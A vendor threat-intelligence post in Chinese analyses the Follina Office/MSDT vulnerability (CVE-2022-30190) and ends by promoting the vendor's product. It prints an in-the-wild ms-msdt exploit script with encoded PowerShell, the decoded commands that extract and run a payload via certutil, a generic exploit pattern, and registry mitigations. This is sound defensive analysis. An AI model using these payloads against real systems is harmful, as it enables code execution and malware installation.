技術分析
RSS

【TeamT5 資安即時快訊】Office 惡意變種再現: CVE-2022-30190 Follina 詳解

6.1.2022Cyber Threat Intelligence
Share:
繼 SpringShell 之後,近日又再爆出另一個高風險的微軟零日漏洞!
CVE-2022-30190 是一個存在於微軟 Office 內的漏洞,威脅行動者可透過微軟支援診斷工具(MSDT, Microsoft Support Diagnostic Tool)執行惡意程式碼。基於微軟 Office 的普及度,影響範圍難以估算。
此外,根據 TeamT5 情資團隊的追蹤,目前已發現多個 APT 族群(包含中國 APT)自 2022 年 4 月初開始,就已利用此一漏洞針對印度、尼泊爾、菲律賓、俄羅斯及白俄羅斯等國家展開攻擊行動。我們研判 CVE-2022-30190 屬於高風險等級的漏洞,呼籲各界儘速採取微軟官方的緩解措施。

影響範圍

根據 SANS Technology Institute 文章說明,受影響範圍如下: Follina_pic1.png
接下來,讓我們一起來了解一下此次的攻擊技術手法:

舊有的攻擊手法重新再啟?!

URL Protocol 一直屬於攻擊者偏好的地方,這是一個很長久的歷史問題。
有關 Microsoft Support Diagnostic Tool 利用的手法,最早公布的時間應該在 The dangers of Electron’s shell.openExternal()—many paths to remote code execution Published: 2020-08-29 T 17:27。
2020 年有研究人員提出 ms-msdt URL Protocol 利用手法,透過 URL 中惡意的 ms-msdt 語句執行其他的程式。
Windows ms-msdt 用來打開 Microsoft 支援診斷工具的協定,該工具用於提供故障排除指引,協助診斷 Wi-Fi 和音效問題等。攻擊者透過輸入惡意的路徑與參數讓程式可以轉向執行惡意的行為。
相關技術細節可以參考下列部落格Follina_pic2.png

ms-msdt URL Protocol 於 Office 文件上重現: Follina 誕生

近期有研究人員於野外捕獲一份運用此攻擊手法的 Office 文件,並命名為 Follina。
Follina 立刻引發了資安圈熱烈的討論與測試,各家資安廠商,都開始正視了這個問題,並積極地來回應相對應的措施。
此樣本透過引用外部物件的方式載入一個惡意網址:
https://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l[.]html
此網址目前失效,但於攻擊發生時,該網頁內容是一個 script:
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";

由上述內容,可看出與 2020年 研究人員所發布的技術相似,透過 MSDT 的利用方式來進行惡意的攻擊。
上述的編碼文字經過解碼後,可得到如下的惡意指令:
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
當遇到類似的 msdt 攻擊,script 內容都會有如下的特徵:
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe\"";

更多詳細的惡意樣本分析可參考 報告連結
類似的攻擊手法可能會在很多情境發生,除了 Office 之外,其它類型的檔案格式也可能受到攻擊。另外,影音撥放程式與檔案總管預覽等支援相關的 URL Protocol,都有可能是攻擊的標的。
攻擊後的行為在 Process Explorer 的 Command Line 上可能會有如下的資訊: Follina_pic3_update.JPG

緩解措施

當前微軟建議的緩解方式是暫時先停用 MSDT 相關的功能,但可能會有不可預期的狀況發生,建議先備份註冊表 MSDT。

MSDT 關閉方式:

方法一:請使用管理者權限透過命令列模式操作,可參考下方附圖
1.備份註冊表中 MSDT 內容: reg export hkcr\ms-msdt backup.key
2.查詢註冊表中 MSDT 內容: reg query hkcr\ms-msdt /s
3.刪除註冊表中 MSDT 內容: reg delete hkcr\ms-msdt /f
4.可再次查詢是否成功刪除: reg query hkcr\ms-msdt /s
Note:若要還原註冊表之 MSDT 內容,可以執行:reg import backup.key

執行畫面:
  • 備份 Follina_pic4_update.JPG
  • 查詢&刪除 Follina_pic5_update.JPG
方法二:透過視窗模式關閉
請使用管理者權限執行 regedit.exe 並且搜尋 ms-msdt,找到之後點選 ms-msdt,點選右鍵選擇匯出進行備份,接著刪除 ms-msdt。
Follina_pic6_update.JPG
詳細的緩解資訊可以參考微軟官方部落格

實際測試 Exploit 執行狀況

POC 攻擊程式 follina.py 執行後,即會在目錄下產生 clickme 的 office 文件,開啓後即會執行惡意攻擊。在此範例中,則會開啟小算盤。 Follina_pic7_update.JPG

ThreatSonar Anti-Ransomware 偵測狀況

經過實際測試,雖然此攻擊手法首次運用在 Office 系列上,ThreatSonar Anti-Ransomware 在不更新的情況下可以直接偵測到此 0-day 威脅,並且標注出 Payload(惡意程式碼)。 Follina_pic8_update.JPG

關於 ThreatSonar Anti-Ransomware

ThreatSonar Anti-Ransomware 是一個資安防禦平台,能有效對抗 APT 攻擊並全面防堵勒索軟體,並提供 MDR 資安代管服務。


6.1.2022Cyber Threat Intelligence
Share:

Related Post

Products & Services
3.23.2022

EDR、MDR 跟企業防駭有關嗎?

EDR, anti ransomware, 防勒索軟體, 勒索軟體解決方案, 勒索病毒掃描, 勒索病毒預防
Products & Services
3.8.2022

除了防火牆,企業更需要的防勒索資安工具: 端點偵測及回應 EDR

anti ransomware, 防勒索軟體, 勒索軟體解決方案, 勒索病毒掃描, T Time 資安小教室
Products & Services
10.1.2021

有效抵禦勒索軟體攻擊,唯有「全面防堵」

ransomware, 針對型勒索, EDR, anti ransomware, 防勒索軟體, 勒索軟體解決方案, 勒索病毒掃描, 勒索病毒預防